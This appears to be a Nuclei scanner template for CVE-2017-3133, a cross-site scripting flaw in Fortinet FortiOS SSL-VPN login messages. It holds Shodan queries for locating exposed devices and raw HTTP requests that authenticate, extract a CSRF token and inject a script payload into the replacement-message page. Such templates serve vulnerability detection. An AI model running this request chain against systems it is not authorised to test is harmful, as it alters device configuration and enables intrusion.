id: CVE-2017-3133 info: name: Fortinet FortiOS < 5.6.0 - Cross-Site Scripting author: ritikchaddha severity: medium description: | A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to execute unauthorized code or commands via the Replacement Message HTML for SSL-VPN. impact: | Successful exploitation could lead to execution of malicious javascript. remediation: | Apply the latest security patches or upgrade to new version to mitigate the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/42388 - https://nvd.nist.gov/vuln/detail/CVE-2017-3133 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-3133 cwe-id: CWE-79 epss-score: 0.00046 epss-percentile: 0.15636 cpe: cpe:2.3:o:fortinet:fortios:5.4.0:*:*:*:*:*:*:* metadata: vendor: fortinet product: fortios shodan-query: - http.html:"/remote/login" "xxxxxxxx" - http.favicon.hash:945408572 - cpe:"cpe:2.3:o:fortinet:fortios" tags: cve,cve2017,fortinet,fortios,xss,authenticated http: - raw: - | POST /logincheck HTTP/1.1 Host: {{Hostname}} Content-Type: text/plain;charset=UTF-8 ajax=1&username={{username}}&secretkey={{password}} - | POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRFTOKEN: {{csrf}} DNT: 1 csrfmiddlewaretoken={{csrf}}&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%0A - | GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRFTOKEN: {{csrf}} matchers-condition: and matchers: - type: word part: body_3 words: - "" - type: word part: header_3 words: - "text/html" - type: status status: - 200 extractors: - type: regex part: header name: csrf group: 2 regex: - 'ccsrftoken_([0-9_a-z]+)="([A-Z0-9]+)";' internal: true # digest: 490a0046304402201640163b95013fe4404c276fdde1abd7f7080a8e9f80dcf047654e379abbaf6902203410030b30aa8d4c9f79ab8b350a9b907644b5066ab9a7252b07dae2f6d2d5e1:922c64590222798bb761d5b6d8e72950